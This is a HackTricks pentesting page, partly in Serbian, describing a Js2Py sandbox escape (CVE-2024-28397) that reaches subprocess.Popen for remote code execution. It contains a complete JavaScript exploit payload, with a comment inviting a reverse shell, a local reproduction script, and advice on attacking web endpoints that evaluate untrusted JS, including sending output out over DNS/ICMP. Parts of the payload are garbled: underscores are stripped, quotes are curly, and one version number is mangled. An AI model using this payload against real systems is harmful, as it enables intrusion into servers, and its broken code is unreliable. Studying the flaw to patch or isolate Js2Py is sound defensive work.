Js2Py sandbox escape (CVE-2024-28397)

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Js2Py prevodi JavaScript u Python objekte, pa čak i kada se koristi js2py.disable_pyimport(), nepouzdani JS može proći kroz Python interne strukture i doći do opasnih klasa kao što su subprocess.Popen. Verzije 20.74 dozvoljavaju zloupotrebu Python refleksionih primitiva koja Js2Py izlaže JS objektima kako bi se dobilo RCE iz inače “sandboxed” JavaScript-a.

Primitive: pivot from JS object wrappers to Python objects

  1. Get a Python-backed object: Object.getOwnPropertyNames({}) returns a dict_keys object in Python space.
  2. Recover attribute access: grab .__getattribute__ from that object and call it to read arbitrary attributes (e.g., "__class__").
  3. Climb to object: from <class 'dict_keys'> read .__base__ to reach Python’s base object.
  4. Enumerate loaded classes: call object.__subclasses__() to walk every class already loaded in the interpreter.
  5. Find subprocess.Popen: recursively search subclasses where __module__ == "subprocess" and __name__ == "Popen".
  6. Execute a command: instantiate Popen with attacker-controlled arguments and invoke .communicate() to capture output.
Example payload abusing Js2Py to reach subprocess.Popen ```javascript // Replace cmd with desired payload (reverse shell / ping / etc.) let cmd = "id"; let hacked, bymarve, n11; let getattr, obj;

hacked = Object.getOwnPropertyNames({}); // -> dict_keys([]) bymarve = hacked.getattribute; n11 = bymarve(“getattribute”); // attribute access primitive obj = n11(“class”).base; // pivot to <class ‘object’> getattr = obj.getattribute;

function findpopen(o) { let result; for (let i in o.subclasses()) { let item = o.subclasses()[i]; if (item.module == “subprocess” && item.name == “Popen”) { return item; } if (item.name != “type” && (result = findpopen(item))) { return result; } } }

// Popen(cmd, stdin/out/err pipes…) then .communicate() for output n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate(); console.log(n11); n11; // returned to caller if framework sends eval_js result back

</details>

Zašto ovo funkcioniše: Js2Py izlaže omotače Python objekata u JS bez uklanjanja `__getattribute__`, `__class__`, `__base__`, ili `__subclasses__`. `disable_pyimport()` samo blokira eksplicitni `pyimport`, ali gornji lanac nikada ne uvozi ništa novo; ponovo koristi već učitane module i klase u memoriji.

## Reprodukovanje lanca lokalno
```bash
# Js2Py 0.74 breaks on Python 3.12/3.13; pin 3.11 for testing
uv run --with js2py==0.74 --python 3.11 python - <<'PY'
import js2py
print(js2py.eval_js("Object.getOwnPropertyNames({})"))                      # dict_keys([])
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__"))    # method-wrapper
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\")"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__.__subclasses__()"))
PY

Rad protiv web sandboxes

  • Bilo koji endpoint koji ubacuje JS pod kontrolom napadača u js2py.eval_js (na primer, Flask /run_code API) predstavlja trenutni RCE ako korisnik procesa ima shell access.
  • Vraćanje jsonify({'result': result}) će zakazati kada .communicate() vrati bytes; dekodirajte ili preusmerite izlaz na DNS/ICMP da biste izbegli prepreke u serijalizaciji.
  • disable_pyimport() ne ublažava ovaj lanac; potrebna je stroga izolacija (separate process/container) ili uklanjanje izvršavanja Js2Py nad nepouzdanim kodom.

References

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks